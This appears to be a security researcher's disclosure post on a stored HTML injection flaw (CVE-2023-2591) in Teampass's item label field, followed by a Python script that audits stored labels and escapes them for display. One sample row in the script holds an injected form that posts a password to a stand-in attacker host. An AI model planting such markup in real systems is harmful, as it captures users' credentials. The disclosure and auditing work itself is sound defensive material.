I recently identified a security vulnerability in nilsteampassnet/teampass, a popular password management tool. This vulnerability, identified as CVE-2023-2591, is a stored HTML injection vulnerability in the item label field. If two users have access to the same folder, a malicious user can create an item whose label field contains injected HTML. When other users view that item, it may redirect them to the attacker's website or capture their data using a form.
- Vulnerability Type: Stored HTML Injection
- CVE: CVE-2023-2591
- Software Version: Teampass 3.0.6
- Author: M Nadeem Qazi
Malicious users can exploit this vulnerability by creating an item with a vulnerable label field that allows HTML injection. When other users view the item, they may be redirected to the attacker's website or have their data captured through a form.
I reported this vulnerability to the nilsteampassnet/teampass team, and it was validated and fixed in version 3.0.7 with commit 57a977. The team also awarded me the disclosure bounty for my report.
The impact of this vulnerability could have been significant, as malicious actors could have exploited it to carry out HTML injection attacks, potentially redirecting other users to an attacker's website or capturing their sensitive data through a form. This could result in the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. It could have also led to a wider breach of security, affecting other users who interact with the compromised item or website.
I want to stress the importance of regularly updating software and implementing secure coding practices to prevent such vulnerabilities. I hope my report will help raise awareness about the potential risks of such vulnerabilities and encourage users to take necessary precautions.
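The following is an added example, not Teampass code and not the fix from commit 57a977: a Python sketch that audits stored item labels for markup and shows the label encoded for display. It assumes labels are available as (id, label) pairs from an export; the function names and sample rows are hypothetical and constructed for illustration.

```python
import html
from html.parser import HTMLParser

class _TagCollector(HTMLParser):
    """Records the name of every element the HTML parser finds in a string."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags via the default handle_startendtag.
        self.tags.append(tag)

def tags_in_label(label):
    """Return the element names that would be parsed out of a label."""
    collector = _TagCollector()
    collector.feed(label)
    collector.close()
    return collector.tags

def render_label(label):
    """Encode a label for an HTML text context so markup is shown, not parsed."""
    return html.escape(label, quote=True)

def audit(items):
    """Return (item_id, tags) for every stored label that contains markup."""
    findings = []
    for item_id, label in items:
        tags = tags_in_label(label)
        if tags:
            findings.append((item_id, tags))
    return findings

# Constructed sample rows standing in for (id, label) pairs from an item export.
SAMPLE_ITEMS = [
    (1, "Prod DB root"),
    (2, "VPN <b>urgent</b>"),
    (3, 'Mail <form action="https://attacker.example/c"><input name="pw"></form>'),
    (4, "Budget 2023 < 2024 & rising"),  # plain text with < and &, not markup
]

if __name__ == "__main__":
    for item_id, tags in audit(SAMPLE_ITEMS):
        print(f"item {item_id}: label contains markup {tags}")
        print("  safe rendering:", render_label(dict(SAMPLE_ITEMS)[item_id]))
```

Running an audit like this after upgrading is useful because labels written before the fix remain in storage and should be reviewed.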
If you're interested in learning more about my findings, check out the report link on huntr.dev.
Stay safe out there!